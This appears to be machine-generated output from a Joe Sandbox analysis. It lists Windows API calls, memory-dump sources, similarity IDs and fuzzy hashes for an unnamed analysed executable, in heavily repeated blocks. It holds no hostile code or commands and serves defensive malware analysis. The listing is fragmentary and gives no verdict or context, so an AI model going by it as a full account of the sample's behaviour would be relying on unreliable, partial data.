                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00F88D52
                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00F88D59
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 00F88F3A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 306214811-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F032AF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F032B7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F032C2
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F032CD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F032D5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F032DD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03205: RegisterWindowMessageW.USER32(00000004,?,00F02964), ref: 00F0325D
                                                                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F02A0A
                                                                                                                                                                                                                                                                                        • OleInitialize.OLE32 ref: 00F02A28
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 00F43A0D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F061A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F06299
                                                                                                                                                                                                                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00F1FD36
                                                                                                                                                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F1FD45
                                                                                                                                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F5FE33
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d6a0eec5c01420870b278d7490c6635cc54dfaee05c6aaf9586db7bc04f1a617
                                                                                                                                                                                                                                                                                        • Instruction ID: 0bade6842f50063137853e2f2a60c4229f52fde86d50986cb44c22e91fec2996
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6a0eec5c01420870b278d7490c6635cc54dfaee05c6aaf9586db7bc04f1a617
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A319871904344AFEB72CF249855BE7BBFCAB12315F10049EDA9A97142C3741A8DEB51
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,?,00F3894C,?,00FC9CE8,0000000C), ref: 00F38A84
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00F3894C,?,00FC9CE8,0000000C), ref: 00F38A8E
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00F38AB9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2583163307-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 51ca6b84c5549ce03a2ae502acc307ae60f19a24ad5b3fb7d2c23efc5ab0f9ee
                                                                                                                                                                                                                                                                                        • Instruction ID: ab1764d1ba4c8890a4a364abf1dce1f33459c89a40f2f61fcf6cab1d21cebdd0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51ca6b84c5549ce03a2ae502acc307ae60f19a24ad5b3fb7d2c23efc5ab0f9ee
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5010432E053647ADE246374AC46B7E77494BC2BB4F29021BF8148B2D2DF3D89827590
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00F397BA,FF8BC369,00000000,00000002,00000000), ref: 00F39744
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00F397BA,FF8BC369,00000000,00000002,00000000,?,00F35ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00F26F41), ref: 00F3974E
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00F39755
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 846dec309671b530c911c8524ce96a76f54fe12b057907c50976a87bf2d59c04
                                                                                                                                                                                                                                                                                        • Instruction ID: 8475b6f52b09a4279173f90e9cd2eed8409f7d66aa16b640f42888612b8eda9e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 846dec309671b530c911c8524ce96a76f54fe12b057907c50976a87bf2d59c04
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF014C33A34118ABCB159FA9EC45DAE7B2AEB85330F240219F811871D0EAB1DD41BBD0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00F0F27B
                                                                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00F0F289
                                                                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F0F29F
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00F0F2B1
                                                                                                                                                                                                                                                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00F532D8
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3288985973-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6fdeb90cceff50df438b30593ec61a0e022475feb0bca6696bae96be4a3c3f27
                                                                                                                                                                                                                                                                                        • Instruction ID: 007026ba70a486577fbf5ecfe44f19d705001e955c3f60a8595ebd1164d733a6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fdeb90cceff50df438b30593ec61a0e022475feb0bca6696bae96be4a3c3f27
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30F082306053489BE770CBA4CC49FDA33ADEB84361F10492AE609C30C0DB30A588FB26
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00F13006
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                        • String ID: CALL
                                                                                                                                                                                                                                                                                        • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00F4413B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F05851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F055D1,?,?,00F44B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F05871
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F03A76
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                        • String ID: X
                                                                                                                                                                                                                                                                                        • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F03A3C
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsThemeActive.UXTHEME ref: 00F0333D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F032E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F032FB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F032E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F03312
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00F03368,?), ref: 00F033BB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00F03368,?), ref: 00F033CE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00FD2418,00FD2400,?,?,?,?,?,?,00F03368,?), ref: 00F0343A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00FD2418,?,?,?,?,?,?,?,00F03368,?), ref: 00F034BB
                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00F03377
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseHandleSleep
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 252777609-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00F0CEEE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LoadString
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00F6FCCE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2358735015-0
APIs
  • Part of subcall function 00F0663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F0668B,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F0664A
  • Part of subcall function 00F0663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F0665C
  • Part of subcall function 00F0663E: FreeLibrary.KERNEL32(00000000,?,?,00F0668B,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F0666E
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F066AB
  • Part of subcall function 00F06607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F45657,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F06610
  • Part of subcall function 00F06607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F06622
  • Part of subcall function 00F06607: FreeLibrary.KERNEL32(00000000,?,?,00F45657,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F06635
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: Library$Load$AddressFreeProc
• String ID:
• API String ID: 2632591731-0
APIs
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
APIs
  • Part of subcall function 00F34FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00F3319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00F35031
• _free.LIBCMT ref: 00F353DF
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: _wcslen
• String ID:
• API String ID: 176396367-0
                                                                                                                                                                                                                                                                                        APIs
